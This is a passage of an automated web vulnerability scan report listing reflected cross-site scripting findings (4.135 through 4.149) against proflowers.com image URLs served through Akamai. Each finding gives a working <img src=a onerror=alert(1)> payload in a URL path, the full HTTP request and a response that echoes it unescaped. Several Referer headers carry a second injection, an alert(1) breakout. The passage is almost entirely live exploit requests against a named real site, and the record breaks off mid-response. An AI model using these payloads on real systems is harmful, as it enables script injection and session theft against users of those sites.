GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img src=a onerror=alert(1)>f1e0c05c9d7

4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198 was submitted in the REST URL parameter 9. This input was echoed as bab1d<img src=a onerror=alert(1)>753a0dd4198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img src=a onerror=alert(1)>753a0dd4198

4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b was submitted in the REST URL parameter 9. This input was echoed as 7a739<img src=a onerror=alert(1)>19e4b46ec9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 117
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img src=a onerror=alert(1)>19e4b46ec9b

4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade was submitted in the REST URL parameter 9. This input was echoed as eb0f5<img src=a onerror=alert(1)>e862abd4ade in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img src=a onerror=alert(1)>e862abd4ade

4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be was submitted in the REST URL parameter 9. This input was echoed as 58402<img src=a onerror=alert(1)>acc34c808be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red50_rbye11_PF58402<img src=a onerror=alert(1)>acc34c808be

4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 40198<img%20src%3da%20onerror%3dalert(1)>c102b875793 was submitted in the REST URL parameter 9. This input was echoed as 40198<img src=a onerror=alert(1)>c102b875793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF40198<img%20src%3da%20onerror%3dalert(1)>c102b875793?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assorted50_grn10_PF40198<img src=a onerror=alert(1)>c102b875793

4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877 was submitted in the REST URL parameter 9. This input was echoed as b5eda<img src=a onerror=alert(1)>edca8607877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img src=a onerror=alert(1)>edca8607877

4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5 was submitted in the REST URL parameter 9. This input was echoed as efcb0<img src=a onerror=alert(1)>e1c89bf3dc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img src=a onerror=alert(1)>e1c89bf3dc5

4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd052<img%20src%3da%20onerror%3dalert(1)>161137e8761 was submitted in the REST URL parameter 9. This input was echoed as dd052<img src=a onerror=alert(1)>161137e8761 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img%20src%3da%20onerror%3dalert(1)>161137e8761?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img src=a onerror=alert(1)>161137e8761

4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16 was submitted in the REST URL parameter 9. This input was echoed as dd2be<img src=a onerror=alert(1)>86af9b73a16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img src=a onerror=alert(1)>86af9b73a16

4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21 was submitted in the REST URL parameter 9. This input was echoed as c2bf3<img src=a onerror=alert(1)>1ee7bd55e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img src=a onerror=alert(1)>1ee7bd55e21

4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43 was submitted in the REST URL parameter 9. This input was echoed as 6ef1c<img src=a onerror=alert(1)>f003a515b43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:12 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img src=a onerror=alert(1)>f003a515b43

4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f was submitted in the REST URL parameter 9. This input was echoed as 4a901<img src=a onerror=alert(1)>846a86c1b6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_14a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:11 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10106_14a901<img src=a onerror=alert(1)>846a86c1b6f

4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5 was submitted in the REST URL parameter 9. This input was echoed as fc21b<img src=a onerror=alert(1)>039a8b320c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:59 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img src=a onerror=alert(1)>039a8b320c5

4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f was submitted in the REST URL parameter 9. This input was echoed as 318c3<img src=a onerror=alert(1)>14ddc48f11f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:04 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img src=a onerror=alert(1)>14ddc48f11f

4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68 was submitted in the REST URL parameter 9. This input was echoed as 443e5<img src=a onerror=alert(1)>94aad6f4a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
